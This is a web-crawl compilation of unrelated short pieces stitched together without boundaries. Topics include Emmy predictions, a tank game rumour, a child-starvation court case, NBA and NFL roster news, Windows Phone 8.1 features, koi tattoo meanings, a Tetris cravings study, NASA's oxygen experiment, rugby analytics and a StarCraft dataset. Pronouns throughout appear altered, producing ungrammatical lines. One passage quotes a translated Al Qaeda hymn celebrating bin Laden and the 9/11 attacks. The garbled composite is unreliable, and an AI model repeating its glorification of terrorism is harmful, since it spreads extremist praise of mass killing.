Be sure to make your Emmy predictions so that Hollywood insiders can see how their TV shows and performers are faring in our Emmy odds. You can keep changing your predictions until just before winners are announced on September 17. And join in the fierce debate over the 2017 Emmys taking place right now with Hollywood insiders in our TV forums. Read more Gold Derby entertainment news.
While we are on the subject of changes, Wargaming is also planning on replacing the existing British Tier X tank destroyer FV215b (183). Why you might ask? To create a logical extension of the current branch.
Wargaming historians found this tank in the archives, but no details on designation and how “obscure” it is where shared. What is this tank? A Super Tortoise? From what we can see in the pictures it's clearly an FV200 hull with, what it looks like, a fixed 120mm gun, but the gun could actually be of a bigger calibre. Logically it will be a better fit to the current branch, but we will have to wait to get more details.
I would suggest anyone who currently doesn't have the FV215b (183) to start the grind and get it as soon as possible. If I'm not mistaken and Wargaming makes the final decision to replace it, the owners of the FV215b (183) will keep it as a special Tier X and receive this new tank for free.
As per usual, more details will be shared once known, but what do you think about this tank?
See Also
A packed courtroom burst out into applause when a Mercer County judge increased the bail for three people accused of beating and starving a seven-year-old Greenville boy.
Amid tightened security, preliminary hearings for the boy's mother, Mary Rader, 28, and grandparents Dennis and Deana Beighley, were held in the Mercer County courthouse on Thursday.
The three were originally scheduled to appear before a magistrate in Greenville on charges of assault, unlawful restraint of a minor, false imprisonment, endangering a child's welfare and conspiracy.
Four additional charges were filed against the trio. They are now also charged with conspiracy and criminal attempt to commit murder in the first and third degree.
Robert Kochems is the Mercer County District Attorney, "Murder in the first degree is a premeditated murder, so we're saying this was thought out, planned out, it just didn't end in the death of the child. The law has changed very recently to allow us to file these charges in our opinion, so that's why they were not filed initially. We wanted to feel like we were on more secure ground when we did it."
Police reports say the unnamed child weighed just 25 pounds when they were found in the Greenville home. They were only fed small portions of tuna fish and eggs and was beaten frequently with a belt, especially when they were caught sneaking food, according the reports.
The child was removed from Greenville schools in 2013 to undergo homeschooling. At home, they allegedly are not permitted out of the house except on the back porch where they would catch bugs and sometimes eat them.
The three had been free on bond. But the judge hearing the case increased bail to $100,000 for each of the suspects, and ordered that they be jailed immediately.
Patti Fowler, with the Neighborhood Watch in Greenville, and was disturbed after hearing details of the case, "Sick to my stomach, disgusted, it's horrific."
Cindy Shuffstall, who sat through testimony at the hearing, is a cousin to Deana Beighley, "I hope they rot in jail. That little boy they had an angel that day in whoever found them on the street, and whoever that is I'd like to thank her."
All three suspects will be arraigned in Mercer County Common Pleas Court on October 7th.
Stay connected with 21 News and wfmj.com for the latest developments on this story.
Right off the top we have to make this note: Lorenzo Brown and Malcolm Miller are signed to a two-way contract. As such, they can only be in the NBA for 45 days during the G-League season.
With the NBA implementing two-way contracts this year, teams can sign two players and add 16th and 17th men to their roster. A two-way contract means the player can freely be sent up and down between the NBA and the G-League, but can only spend a maximum of 45 days in the NBA. Teams, however, can sign players to an NBA contract if they reach the full 45 days. Also, you must have four or fewer years of NBA experience to sign a two-way contract.
When two-way contracts were introduced many didn't know how players, teams or even agents would react to it. While the initial thought was it would most likely go to undrafted rookies, the Toronto Raptors took a different approach.
Lorenzo Brown, PG/SG
The Raptors signed Lorenzo Brown a 27-year old guard who has spent time with the Phoenix Suns, Philadelphia 76ers, Minnesota Timberwolves, Detroit Pistons (training camp only) and a bevy of overseas teams. Brown has also spent parts of four seasons in the G-League as well.
Brown may arguably be one of the best players signed to a two-way contract.  They are a versatile guard, and a veteran of the G-League. When they are up in the NBA, Brown has had enough NBA experience to warrant some minutes and not just be an end of the bench player.
In their NBA career so far, Brown has played in 63 NBA games, averaging 13.2 minutes, along with 3.3 points, 1.7 rebounds, and 2.3 assists per game, while shooing 37 percent from the field, and a measly 15.2 percent (yikes!) from three.
However, in just eleven games in the G-League last season Brown was easily one of the better players in the league. Brown started nine of the eleven games with the Grand Rapids Drive while averaging 35.8 minutes per game. They were an effective scorer averaging 23.6 points, 7.7 rebounds, 4 assists and 1.7 steals per game. Brown also shot a much more reasonable 47.3 percent from the field and 35.3 percent from three.
Brown in the G-League can be the Raptors 905's starting shooting guard, and put up spot minutes running the point. The 905 will need Brown and assignment players this season as every major contributor last season has signed overseas, leaving coach Jerry Stackhouse's roster in flux.
In the NBA, Brown could see some emergency minutes behind DeMar DeRozan at shooting guard. Theoretically, putting Brown into the rotation gives coach Dwane Casey and the Raptors a versatile guard who can play both the point and shooting guard, bringing everything those two positions require.
In reality though, Brown won't have a huge role on this team. Their destiny for 2017-18 will be a much bigger role with the 905.
Malcolm Miller SG/SF
Malcolm Miller is on the opposite side of the spectrum from Brown, as Miller has zero years of NBA experience. Miller went undrafted in the 2015 NBA draft and then spent the 2015-16 season with the Maine Red Claws of the then D-League as an affiliate player for the Boston Celtics. Miller then spent last season in the German Bundesliga league with Alba Berlin.
Miller will also be a key player for the 905 this season, as they help them restock their depleted roster. Miller, however, is currently injured and it is unknown if they will be back in time for the start of the G-League season.
In 2015-16 with the Red Claws, Miller had a great rookie season, where they started 43 games and played in 47. There they averaged 12.4 points, 4.2 rebounds, and 1.2 assists in 31.8 minutes per game while shooting 49.6% from the field and 39.8% from three.
Miller was also a very good player last year with Alba Berlin in a very good German league which you can see in the clip below.
If Miller can duplicate their success from Maine with the 905 this season they can ideally replace the production lost by the departing of Axel Toupane and E.J. Singler. As it stands, between the two two-way contracts, Miller is more likely to spend more time in the G-League.
The Raptors did sign two very interesting players to these contracts and it will be interesting to watch them play this season, and to see how the Raptors will deploy them.
After the Rolando McClain dismissal at practice on Wednesday and the ensuing media frenzy it seemed all but certain that today Rolando McClain would be cut. So far though no decision has been made on what the future is to hold for Rolando.
“Really nothing more than we asked them not to come to practice today. There's going to be consequences for their actions. It's a team related-issue, and I don't really want to get into the details of it. But we asked them not to come to practice today." says coach Allen during their media session on Thursday.
After Rolando's ill-advised and self destructive Facebook tirade yesterday, which since has been removed, the Raiders had other options become available besides just an outright cut from the roster.
I know many of us fans would much rather just cut ties with McClain right away. After their notorious tirade yesterday where they claimed to want to play for a "real team" though they now can face a team suspension instead. A suspension for the rest of the year from conduct detrimental to the team does have several benefits.
One is that the rest of their salary for this year would go unpaid and therefore be more of a punishment than a cut would be to McClain. A suspension also would be more of a punishment because McClain would have no chance to play for anybody the rest of the year. That would certainly make them regret their now infamous comments.
The last benefit of a suspension that I will mention is that it allows the Raiders to hold onto them until they are able to make trades again. Even a 7th round pick would be better than nothing, although getting anything for them is probably unlikely.
An outright cut from the roster has benefits in its own rights too. The main benefit with cutting them right now is that there are teams with serious injury problems that could be more enticed to claim McClain now rather than in the off-season. The Raiders have enough dead money with the off-season cuts of Routt and Wimbley, it'd be nice to not add more onto that tab by McClain going unclaimed. Whether cut now or in the off-season there is no guarantee they will be claimed either way though.
With this situation comes weighing the options and the Raiders will take their time to make their decision.
"This is something that we have to make a decision as an organization, and we're going to make sure we make the right decision.” says Allen.
Whichever way they go as long as McClain never plays another down as a Raider I will be happy. Bill Romanowski definitely agrees with me on that.
When Dennis Allen was asked if not making an immediate decision on Ro sends the wrong signal DA's response was "No, I'm not sure what signal anybody is looking for. We're going to make a decision and that's what we're going to do.”
While some are arguing that this event is a sign of Dennis Allen losing the locker room the opposite very well could be true. The way Allen is handling this mess can actually increase the respect for Allen in the locker room.
Just like with Aaron Curry's release, how DA is handling Ro tells this team that they will rule with discipline and that no matter your draft possesion nobody should be complacent. If any players want to keep their jobs then they should take heed to the example being made of McClain who was the 8th overall pick in the 2010 draft.
That rant by McClain didn't just throw the coaches under the bus, it threw Ro's teammates under the bus as well. There is no doubt that some of their teammates would have and should have been offended. They now want to see action from Allen about this and they are going to get more respect from them by not giving Ro a pass.
If Ro is not playing this week Omar Gaither will start at MLB instead. They have one year of experience at that possession. This is what DA had to say of Gaither:
“He's a veteran player and they understand football. He's started a lot of games in their career. He's a guy that's played. He's picked up on the defense quickly. So we have confidence that he'll be able to go, if that's needed."
DA already is getting more respect from me for pulling the plug on the disappointment that is Rolando McClain. That of course is only the case as long as Rolando will never again taint the Raiders colors by wearing them upon their chest though.
Sam Forencich/Getty Images
It was not literally in the official contract signed by and between the Chicago Bulls and Dwyane Wade, but it was understood just as well as the terms or compensation or NBA logo in the upper left corner.
When you add a player with these accomplishments, those championships, the movie-star wife and the 6.28 million Twitter followers, they are going to become the voice of the team.
The only way they won't be telling people what to do, and how it should be done, is if they can't fulfill the "services" section of the contract at age 35, falls way short of statistical expectations and organically loses their alpha standing. (To Wade's credit, that hasn't happened despite the wear on their shoulder and knee, their career lows in shooting—42.8 percent—and assists—3.8 per night—to go with their 18.9 points per game.)
Throw in the fact that they are from Chicago and saw how much a homecoming elevated buddy LeBron James' empire, plus how Wade just lost a power struggle with Pat Riley in making the decision to leave the Miami Heat, and their move to the Bulls was always going to be a stage for Wade to flex.
Gary Dineen/Getty Images
And in their exercising of power, the Bulls have become a portrait of dysfunction.
Wade went to Chicago to be the truest form of themselves they ever has been, to have the most confident year of a very confident life.
Whatever Wade wanted it to be like was what it was going to be like, and it has been their choice since the season started to work mostly inside the comfort zone of making this another buddy movie. Wade has embraced All-Star Jimmy Butler, and Butler has embraced Wade.
The two are like brothers. Wade is introduced first before the game, and Butler is introduced last. Wade waits until right before tipoff to change into their game jersey; Butler does the same.
And the two both erred in calling out their teammates publicly after a recent loss to the Atlanta Hawks. Wade was so crazy comfortable with their power that they overreached with it, and Butler followed.
Wade understood their misstep, which is why they quietly accepted Rajon Rondo's Instagram blowback on behalf of the team's everymen.
Dishing out that comeuppance to Wade was easily the highlight of Rondo's season, which has seen them out of the starting lineup for weeks (and even out of the rotation recently).
In their 11th season, Rondo has played almost as many years as Wade (14th) in this league, so they bring some specific clauses to their contract when they sign, too. They have been an independent thinker who is cool with being brusque, so their righteous role in the drama last week was not surprising.
Nor was their willingness to stand up for the Bulls' rank-and-file players.
During training camp, it was Rondo who drove up from Chicago to Milwaukee for an exhibition game against the Bucks when it was agreed beforehand that Butler, Wade and Rondo would rest. Even though they're both big in Milwaukee from both going to Marquette, Butler and Wade stayed home rather than join the team.
Despite Rondo's benching and the public back-and-forth, no one should expect the Bulls to move them in an admission of roster-building guilt before the Feb. 23 trade deadline.
The Bulls, finally, are headed in a more logical direction on the court now with a clearer definition of player roles.
Rondo appears to have found a relative comfort in pushing tempo and creating shots for the young legs of the second unit rather than competing for the ball with Butler and Wade, who yearn to be de facto point guards anyway.
A more confident coach than Fred Hoiberg might have identified that reality sooner. Instead, they acceded to their stars' (nicknamed "The Three Alphas" by Rondo before the season) egos while failing to trust their gut that rookie Paul Zipser, one of the most experienced players coming to the NBA from Europe, was ready to help bolster that second unit until recently.
Not only has Rondo gained more playing time in recent weeks, they also have gained some respect from the incidents of the past week.
Jonathan Daniel/Getty Images
For Wade, the reaction to their critique of teammates was a reality check about the limits to which a veteran, even a legend and champion, can sneer at young teammates without practicing alongside them.
(Some within the Los Angeles Lakers referred to the limited practice schedule of once-maniacal worker Kobe Bryant as far back as 2011 derisively as "Kobe Spa Days.")
Now that the turmoil has spilled over, the Bulls' best chance to build on it is not so much for Rondo and Wade to make super-nice from now on. It's for Butler to deliver themselves from stardom to an even higher level and for the front office eventually to follow through on its initial plans to surround them with much-needed athleticism. Rondo and Wade remain a terrible match basketball-wise, so there's a limit to how good the Bulls can be with them together.
The Bulls rank 29th in the league in field-goal shooting, last in three-point percentage and last in three-pointers made per game. It's also no coincidence that Butler has especially erupted since the ball-dominant Rondo got pushed out of their way back in December.
Let it be said that the Bulls did get something out of this past week: a reminder that a team is always more than its stars—and a lot of exposure.
It might look embarrassing to have your team publicly sniping, but relevance comes in an array of ways in the sports and entertainment world, including via breathless reports of self-inflicted wounds. The Bulls have our attention, and many around this league believe that's all they ever really wanted in putting this hodgepodge roster together.
As they embark upon a challenging six-game trip through the Western Conference, the Bulls have been the talk of the NBA.
Kevin C. Cox/Getty Images
On some backward level, kudos should go to John Paxson and Gar Forman in the Bulls front office for "accomplishing" something besides an unwillingness to tank.
The Bulls—with their league-leading attendance for the eighth consecutive season, Second City charisma and those iconic uniforms unchanged from Michael Jordan's era—did not want to lose their relevance any sooner than necessary.
So the Bulls said yes to signing Wade and Rondo. And here you have them at 24-25...far more interesting than your typical .500 team.
That was always the biggest draw to bringing Wade home at this point in their career: to replace the fame from the best days of Jordan and Rose, and keep our eyes on the Bulls.
Kevin Ding is an NBA senior writer for Bleacher Report. Follow them on Twitter @KevinDing.
Earlier today we got our first comprehensive look at the new features coming in with WP 8.1, thanks to the developers SDK. Although Microsoft hasn't enabled the Bing functionality, or the voice assistant in this release there are still plenty of other things to look at. Thanks to @AngelWZR on Twitter, here are some more screenshots and details of the upcoming release.
Starting with the image above, is the redesigned volume controls we've seen before, which give separate controls for the ringer/notifications as well as Media/Apps, a welcome change for those of us who want to lower their gaming volume but not miss out on notifications.
Next up is a new feature which disables single presses on the Bing search button while in a fullscreen app (like a game, capturing a video/image etc.); the search button was ridiculously sensitive (not to mention useless) that some users went as far as epoxying it to stop it from going off. With 8.1 when in a fullscreen app users have to double tap the search button to open the bing app, pretty clever.
It seems Microsoft and Google have worked out their issues, as not only is the Youtube site playing in the browser without any problems, but when setting up a Gmail account you can sign in through the web authentication (OAuth), which should hopefully restore proper Gmail service with push.
Also present is “project my scree” which is the ability to share show your phone's screen onto a device; similar to how Nokia do in their releases, pretty useful if you need to share a presentation or video on the go.
A big change for anyone who's used the calendar on WP is the new weekly view, which brings up any events for this week in large tiles, as well as showing the predicted weather for those days (nice feature); and has done away with the annoying Lorem Ipsum text that confused many. Yay for progress.
Advertisements
We heard of the “Battery Power Sense” app earlier, and here's a glimpse of what it will look like, showing you what apps have been using power recently (hopefully with a detailed breakdown of which apps are the most power hungry).
The skydrive in the photo albums is no longer an album of its own, but will instead launch the Skydrive/OneDrive app (no idea why they did that.. unless the Skydrive app is going to be integrated properly into the OS). Here's a look at the new Podcasting app (hopefully available internationally), as well as the settings for the app; which feature options for autodownload and streaming on the go.
Advertisements
Related
Category: Lumia, Nokia, Windows Phone
Syrian Rebels Praise Bin Laden, Celebrate 9/11 Attacks01/01/13) Footage of a Syrian Opposition Demonstration in whichparticipants sing an Al Qaeda song reminiscing upon the 'sweet memory' ofthe 9/11 attacks and praising Bin Laden as their leader. This isn't thefirst time the song has been featured at opposition demonstrations atwhich Al Qaeda flags are commonplace.Basic Verse translation of the song in question which is a well known Al Qaeda hymn."If they call me a 'terrorist', I would say: 'It is an honor for me'Our terror is praised, with a divine callingOur leader, the Mullah (Omar), did not forsake their religionAll the soldiers have sold their souls to AllahOur leader bin Laden, America's worst nightmareWith the power of faith and our weaponsWe destroyed America with a civilian planeThe World Trade Centre was turned into a pile of rubble
Power Racing Series
By stephania, Apr 27, 2016
Step 1: Form a Power Racing Series team.
Step 2: Acquire a Power Wheels ride-on car.
Step 3: Design & build your best all-electric Power Racer.
Step 4: Add flare! Give the car & team some personality!
Step 5: Come in October and RIDE FOR GLORY!
Teams throughout San Diego County are making Power Racers for October's Maker Faire San Diego. Race against other electric car hacks and show off your team's personality. Awards are given for both speed and moxie.
Interested in learning more? Looking for others to form a team? Want to learn about our PRS Starter Kit? Contact the San Diego Maker's Guild or attend a meetup.
You can also message us on Facebook, Twitter, or even Instagram!
For car and race details as well as great video, visit PowerRacingSeries.org.
65+ Traditional Japanese Koi Fish Tattoo Designs & Meanings – True Colors (2019)
Koi is a Japanese word for Carp. Japanese people have, for years, used Koi fish tattoo designs as a cultural symbol for overcoming adversity. Stories are told of how they climb waterfalls that have strong currents. It is said Koi was determined to reach the top of the waterfall so it persevered and succeeded.
Contents:
What designs are available
What to remember
The Chinese also have their own version that says the koi swam against the current of the yellow river to reach the Dragon gate and when they reached the Dragon gate they turned into a dragon.
Today these legends have inspired many people who have gone through adversity to get Koi fish tattoo designs. Such people use the symbol as a reminder of the luck or the bravery that helped them succeed or overcome an obstacle.
It is a fitting tattoo, say, for one who successfully battled a disease like cancer or went through a lot to win the love of their life. The Koi fish design is their personal mark of success amidst adversity. It can also serve as inspiration to work hard and achieve.
But for some, they are just drawn to the artistic design with the curves and the colors and so on.
What designs are available
Koi fish tattoos come in different designs and colors which have different meanings associated with them.
Here are some of the designs and their meanings:
The Red Koi Tattoo.
Red is taken as an energetic color so the tattoo is typically an expression of masculine love. It can be used to represent love for a woman by a man or a woman can have one as a reminder of the strong love they have for someone or commitment to something – It is passionate.
The Black Koi Tattoo.
Black symbolizes great adversity, the black koi fish is used to represent adverse struggle to succeed. It can be a story of rags to riches, a symbol of surviving a battle and coming out alive. Whatever hardships one has to go through to get to the point they are now can be represented by this tattoo.
Dragon Koi Tattoo.
This is inspired by the Chinese Legend. The Dragon koi is usually yellow and is swimming upstream in the yellow river to transform into a dragon. This signifies a person striving to fulfil their destiny amidst the different obstacles.
It is a bit like the black koi because there is a relation to adversity but it is also used to symbolize strength, courage, bravery to challenge the odds in order to create one's own destiny and get reborn. It can serve as a symbol of rebirth.
Like a woman who gathers the courage to leave an abusive marriage or an employee who leaves their job to try and set up their own business. It can also be used to indicate a new beginning after bereavement.
Blue Koi Tattoo.
Blue is usually associated with men but it can also be used as a symbol of reproduction. The blue fish design is associated, however, with a stage in dealing with adversity.
If the blue Koi is swimming upstream in the tattoo, then it symbolizes a person who is currently going through some trials in their life and they are facing them boldly. If, however, the Fish is swimming down the stream, then the person has already dealt with the trials and is moving on with their life.
Sometimes people may interpret the blue koi swimming down to mean that you have given up on something or someone.
Koi and the Lotus Tattoo.
This design may have different interpretations. The Lotus flower is a common tattoo design and also grow commonly around muddy ponds adding beauty to the ponds.
When it is used in a Koi design tattoo it could symbolize purity of the person with the tattoo, it can also be a symbol of optimism in the face of challenges as well as a change in life. It can also symbolize unstoppable success and determination.
It is also just a nice design to have for a tattoo and may not symbolize anything in particular. Many times it is just left up to anyone to interpret it the way they see fit.
Ying-yang Koi Tattoo.
This is at times used as a symbol of the zodiac. People whose star sign is Pisces, many fancy having a yin and yang tattoo but it is also the symbol for the balance in nature which is the belief that all things are related and work together to create a balance in life.
This tattoo may be designed in different colors from the original black and white which is the color for Ying-Yang to any other color of your choosing.
There have emerged many more koi fish tattoo designs with many different meanings but the above are the most common and traditional Koi tattoo designs from Chinese and Japanese culture.
The designs will usually have elegant curves and depictions of the bright scales of the koi which is a gentle yet agile fish.
What to remember
If you are thinking of getting a Koi Fish tattoo, you may want to consider having it put where it can be seen if you are trying to share your story with other people. Many people like to get it on the arm so that it is visible when you are wearing a sleeveless shirt or dress.
But some women prefer to have it on their belly or the back. There are others who like to be naughty and have one swimming up their inner thigh.
It is important that you have a skilled tattoo artist design for you this tattoo for the best results. If it is done well you will have a really lovely piece of art on your body that you can proudly show off. On the other hand if it is done poorly you will just end up being a big joke.
Remember tattoos are permanent so avoid having mistakes done on you.
You can carry out a bit of research on the artist you choose to draw for you the koi fish. See what work they have done before and find out if they have actually done the particular one you would love to have. Otherwise it is a great choice of Tattoo.
It has been said that "the true voice of [Hunter S.] Thompson is revealed to be that of American moralist ... one who often makes themselves ugly to expose the ugliness they see around him." That ugliness served its literary and journalistic purpose, no doubt. As for the purpose it served in their private life, in the realm of getting nitty-gritty, mundane things done, that's a whole other question. Not much is known about this clip other than it features a NSFW voicemail that the gonzo journalist left for their local AV guy in Woody Creek, Colorado. The poor man....
Related Content:
Hunter S. Thompson Remembers Jimmy Carter's Captivating Bob Dylan Speech (1974)
Hunter S. Thompson Gets Confronted by The Hell's Angels
Johnny Depp Reads Letters from Hunter S. Thompson (NSFW)
Aw Tetris. The crazy tile-matching video game that came out in the 1980s. It certainly seems simple, but there may be more to this game-challenging classic than meets the eye. A recent study suggests that Tetris could actually help dieters reduce cravings.
According to researchers from Plymouth University in the United Kingdom, they worked to examine how the game can affect people's carvings. The study authors were made up of Ph.D. student Jessica Skorka-Brown, as well as Professors Jackie Andrade and Jon May from the University's Cognition Institute.
For the study, researchers created two study groups: One that played Tetris for three minutes while the other group was told that the game was loading but they never received the chance to play. All of the participants were then asked to rate their cravings for cigarettes, food and alcohol based on the vividness, intrusiveness and strength of those cravings.
Those in the Tetris group showed a 24 percent reduction in cravings following their activity with the game. Unfortunately, the other group who did not get to play Tetris did not experience any craving reductions.
"Feeling in control is an important part of staying motivated, and playing Tetris can potentially help the individual to stay in control when cravings strike. It is something a person can quickly access, for the most part whether they are at work or at home, and replaces the feeling of stress caused by the craving itself," Andrade concluded, via Medical Xpress. "Ultimately, we are constantly looking for ways to stimulate cravings for healthy activities - such as exercise - but this is a neutral activity that we have shown can have a positive impact."
What do you think?
More information regarding the study can be found via the paper, "Playing 'Tetris' reduces the strength, frequency and vividness of naturally occurring cravings," published in the journal Appetite.
WASHINGTON — NASA plans to make oxygen, a central ingredient of rocket fuel, on Mars early in the next decade.
Space agency officials on Thursday unveiled seven instruments they plan to put on a Martian rover that would launch in 2020, including two devices aimed at bigger future Mars missions.
The $1.9 billion rover will include an experiment that will turn carbon dioxide in the Martian atmosphere into oxygen. William H. Gerstenmaier, an associate administrator for NASA, said the oxygen could then be used to make rocket fuel and for future astronauts to breathe. Taking fuel to Mars for return flights would be heavy and expensive.
The device, named Moxie, operates like an engine but in reverse, said Michael Hecht, the scientist at the Massachusetts Institute of Technology who is running the test project. It will make about three-quarters of an ounce of oxygen an hour.
*Please note we've made changes to this article to reflect more accurate data obtained from the Ireland/England game.
Ireland are the perfect opponents for Allister Coetzee's dewy Springboks, who will on Saturday announce themselves and their new identity to a rejuvenated South African public. The Irish have had South Africa's number of late winning four out of their last six encounters and whipping the Boks 29 – 15 the last time they met, so there'll be a flavour of revenge at Newlands this weekend. And although they don't present the same threat that the All Blacks do they are a clinical, well-drilled group who will quickly sniff out Springbok weaknesses. Joe Schmidt is a canny operator. He'll teach Coetzee more about their team in three tests than a video analyst could in a dozen.
Of course data and analysis does have its place; not just for stats-happy rugby anoraks such as ourselves but also when it comes to picking out tendencies in the way a team plays. Rugby Analytics took a look at Ireland's Six Nations match against England to see what they could find. It's a sample of one, but some interesting nuggets came out of it nonetheless.
THE RUCK OF THE IRISH
First, let's take a look at how Ireland defended against England to get a snapshot of their defensive DNA. They would have had match-specific tactics in this game but it's fair to say that overall they probably employ a consistent philosophy.
A good entry point to understanding a team's D is to look at how they approach rucks. Where do they choose to be aggressive? Do they attack you at the source – sending men into your tackle point to try and slow you down or steal your ball? Or do they prefer to stand off and use those extra numbers in the line to get in your face?
Rugby Analytics tells us that in this game the Irish sent on average 1.1 men to every ruck (compare this to the Lions for instance who send on average 0.5 men to every ruck), so they like to focus their attention there. Whereas 32% of English rucks were not contested, the Irish swarmed carries in the 9-10 channel with 79% of all rucks contested there.
What does all this mean to the Boks?
It means that the Irish are going to try and spoil our ball. If this English game is a template it tells us that Joe Schmidt likes to roll the dice and uses their numbers to disrupt your possession before you can use it. Should the Irish play like this again there is both danger an opportunity for the Springboks.
The danger, naturally, is that they get outplayed at the breakdown, which means that the Bok machine will never get going. And if the Boks try to generate momentum in the close channels they might be frustrated by the Irish presence there. If so they'll need a plan B in their back pocket.
The opportunity? If the Springboks can get quick ball despite Irish interference then Schmidt's gamble could be their undoing. By choosing to send their men into rucks they could find themselves outnumbered in the line. This happened on a few occasions when the English went “same-way” on attack, testing the Irish ability to fold and setting up honeypot rucks that sucked in more of their defenders.
Although it's not always as simple as that, as the Springboks themselves will have to commit cleaners to ensure possession. It also possibly explains why Allister Coetzee has gone with both Siya Kolisi and Francois Louw for this match. The openside flank's role on attack is to be first over the ball when a tackle happens. The Boks seem to have sacrificed a traditionally bigger blindside flank in favour of two quicker ruck police officers who can hopefully get to the contact points fast.
A quick comment from a reader Daz, who says:
“Hi, just a heads-up, Ireland have a new defence coach in Andy Farrell (previously England and B&I Lions defence coach), who favours faster linespeed and more aggression on D, as opposed to the soft drift Ireland have used under Schmidt for the last 3 years.”
That's a good point and South Africa face the prospect of a far more aggressive Irish line defence at Newlands on Saturday. Either way, this first test will be fascinating because both teams don't really know what to expect from each other.
THE IRISH ATTACK
Again, this data is based on Ireland's game against England and they would have had specific patterns and targets for that match, but it's still worth looking at how and where the potato eaters chose to strike. Rugby Analytics' Attack Targets table can tell us more (click to enlarge).
The first thing we notice is that there's a lot of grey, which indicates all the Irish incursions in the 9-10 channel. This is a team who were narrow on attack. What's interesting though is that their next most favoured channel was outside the 15m line (the blue bits on the table), so they (mostly) played close-in or out-wide, with fewer strikes in the middle. When they did go wide they used a pod as a decoy, double tracking to fix the middle of the English line. Perhaps Joe Schmidt believes in extremes – barging up close to the ruck or stretching you out wide, eschewing more progressive strike points moving across the field.
What's also interesting is how tight the Irish play on 2nd phase, with one-out runners hitting to blindside (light blue), the 10-12 channel (green) or the at 9-10 (grey) 60% of the time. The Springboks have some solid meat in their pack but have chosen to go without a traditional blindside bruiser. It remains to be seen whether this type of player will be missed if the Boks want to shut down these narrow carries on 2nd phase.
We have a feeling that this same Target chart for Saturday's game will feature a lot more green and yellow, as the Irish will undoubtedly be looking to test the brand-new axis of Lambie, De Allende and Mapoe in the middle of the field. On top of that Damian de Allende's defensive positioning has long been an issue, so their role as Lambie's outside partner and Mapoe's inside wingman will no doubt be tested. The lad from Milnerton should expect some high-speed Joe Schmidt puzzles coming their way tomorrow.
SET PIECE
One last interesting titbit is how the Irish played off set piece against England, because they approached their strike plays completely differently at the scrum and lineout..
From lineouts the Irish hit the 9-10 channel 67% of the time, which is no surprise as the weak seam between the flyhalf and their occupied forwards can be super profitable. But from scrums it was the opposite, as the Irish went wider – attacking outside the 13 channel 67% of the time. With the English forwards locked in the scrum and their outside backs standing deeper for kicks they took advantage of the space on offer.
In both cases – after scrums and lineouts – they would then (mostly) set up a narrower strike on 2nd phase to try and commit still more English forwards.
These close-in tendencies of the Irish – both on attack and in defence – will be something to look out for. The Boks have devastating carriers in Etzebeth, De Jager and Vermeulen so they could get go-forward here regardless, but their follow up and cleaning will have to be sharp if they want to avoid getting bogged down in a slow ball nightmare. Should they do this, Faf de Klerk will be able to hit the turbo button with their lightning fast service and the Bok backs will be brought into the game on the front foot.
SkillCraft1 Master Table Dataset Data Set
Download : Data Folder , Data Set Description Abstract: This data was used in Thompson et al. (2013). A list of possible game actions is discussed in Thompson, Blair, Chen, & Henrey (2013). Data Set Characteristics: Multivariate Number of Instances: 3395 Area: Game Attribute Characteristics: Integer, Real Number of Attributes: 20 Date Donated 2013-10-22 Associated Tasks: Regression Missing Values? Yes Number of Web Hits: 50411
Source: -- Creators: Mark Blair, Joe Thompson, Andrew Henrey, Bill Chen
-- Mark Blair: Department of Psychology; Simon Fraser University; Burnaby;
8888 University Drive; mblair '@' sfu.ca )
-- Date: September, 20, 2013
Data Set Information: -- We aggregated screen movements into screen-fixations using a Salvucci & Goldberg (2000) dispersion-threshold algorithm, and defined Perception Action Cycles (PACs) as fixations with at least one action.
-- Time is recorded in terms of timestamps in the StarCraft 2 replay file. When the game is played on 'faster', 1 real-time second is equivalent to roughly 88.5 timestamps.
-- List of possible game actions is discussed in Thompson, Blair, Chen, & Henrey (2013)
Attribute Information: 1. GameID: Unique ID number for each game (integer)
2. LeagueIndex: Bronze, Silver, Gold, Platinum, Diamond, Master, GrandMaster, and Professional leagues coded 1-8 (Ordinal)
3. Age: Age of each player (integer)
4. HoursPerWeek: Reported hours spent playing per week (integer)
5. TotalHours: Reported total hours spent playing (integer)
6. APM: Action per minute (continuous)
7. SelectByHotkeys: Number of unit or building selections made using hotkeys per timestamp (continuous)
8. AssignToHotkeys: Number of units or buildings assigned to hotkeys per timestamp (continuous)
9. UniqueHotkeys: Number of unique hotkeys used per timestamp (continuous)
10. MinimapAttacks: Number of attack actions on minimap per timestamp (continuous)
11. MinimapRightClicks: number of right-clicks on minimap per timestamp (continuous)
12. NumberOfPACs: Number of PACs per timestamp (continuous)
13. GapBetweenPACs: Mean duration in milliseconds between PACs (continuous)
14. ActionLatency: Mean latency from the onset of a PAC to their first action in milliseconds (continuous)
15. ActionsInPAC: Mean number of actions within each PAC (continuous)
16. TotalMapExplored: The number of 24x24 game coordinate grids viewed by the player per timestamp (continuous)
17. WorkersMade: Number of SCVs, drones, and probes trained per timestamp (continuous)
18. UniqueUnitsMade: Unique unites made per timestamp (continuous)
19. ComplexUnitsMade: Number of ghosts, infestors, and high templars trained per timestamp (continuous)
20. ComplexAbilitiesUsed: Abilities requiring specific targeting instructions used per timestamp (continuous)
Relevant Papers: 1. Thompson JJ, Blair MR, Chen L, Henrey AJ (2013) Video Game Telemetry as a Critical Tool in the Study of Complex Skill Learning. PLoS ONE 8(9): e75129. [Web Link]
-- Results:
-- Skip league conditional inference forest classification (Bronze-Gold;Silver-Platinum;Gold-Diamond;Platinum-Masters;Diamond-Professional) showed changing patterns of variable importance with skill.
-- Predicted attribute: League (Ordinal)
Citation Request: You are free to copy, distribute and transmit this work under the following conditions: You must give attribution to the work (but not in any way that suggests that the author endorses you or your use of the work); You may not use this work for commercial purposes; You may not alter, transform, or build upon this work. Any further uses require the permission of the rights holder (or author if no rights holder is listed). These rights are based on the Creative Commons Attribution-NonCommercial-NoDerivatives License.
I try not to change a prediction, however silly it might be looking. (As we know, many have looked utterly ridiculous .) My reasoning: I'd rather not be wrong twice. Sometimes, however, circumstances intervene. Back around Memorial Day, I picked Georgia Tech to go 9-3 and win the ACC Coastal. That forecast is hereby revised.
I picked Tech to win its division even though Justin Thomas, its best player, had completed their eligibility. If that was a reach, it was a considered one: Every other Coastal contender is also changing quarterbacks. I also figured that Dedrick Mills might well be the division's best player. On Friday, Mills became an ex-Techie.
The most important positions in Paul Johnson's offense (and therefore on Paul Johnson's team) are quarterback and B-back. In the Yellow Jackets' best seasons under this coach – 2008, 2009, 2014 and 2016 – they had big-time performers at both spots: First Joshua Nesbitt and Jonathan Dwyer, then Thomas and Zach Laskey/Synjyn Days, last year Thomas and Mills. With holes at both QB and BB, I no longer see a way this team can win nine games. I no longer believe it will take the Coastal.
